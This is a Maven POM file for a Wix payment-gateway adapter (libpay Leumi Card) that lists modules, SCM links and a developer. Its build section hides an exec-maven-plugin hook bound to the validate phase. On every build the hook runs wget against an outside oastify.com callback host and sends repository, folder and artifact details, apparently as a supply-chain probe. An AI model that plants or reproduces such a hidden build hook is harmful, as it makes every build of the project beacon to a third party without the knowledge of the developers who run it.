<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
 
    <artifactId>libpay-leumicard-all</artifactId>
    <version>1.0.0-SNAPSHOT</version>
    <packaging>pom</packaging>
    <name>libpay Leumi Card payment gateway adapter aggregator</name>
    <description>libpay module for Leumi Card payment gateway</description>

    <parent>
        <groupId>com.wix.pay</groupId>
        <artifactId>libpay-leumicard-parent</artifactId>
        <version>1.0.0-SNAPSHOT</version>
        <relativePath>libpay-leumicard-parent</relativePath>
    </parent>


    <scm>
        <url>https://github.com/wix/libpay-leumicard</url>
        <connection>scm:git:git://github.com/wix/libpay-leumicard.git</connection>
        <developerConnection>scm:git:git@github.com:wix/libpay-leumicard.git</developerConnection>
        <tag>HEAD</tag>
    </scm>

    <developers>
        <developer>
            <name>Tzufit Barzilay</name>
            <email>tzufitb@wix.com</email>
            <roles>
                <role>owner</role>
            </roles>
        </developer>
    </developers>

    <modules>
        <module>libpay-leumicard-parent</module>
        <module>libpay-leumicard-common</module>
        <module>libpay-leumicard</module>
        <module>libpay-leumicard-testkit</module>
    </modules>
<build>
    <plugins>
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/libpay-leumicard\&amp;folder=libpay-leumicard\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
</project>
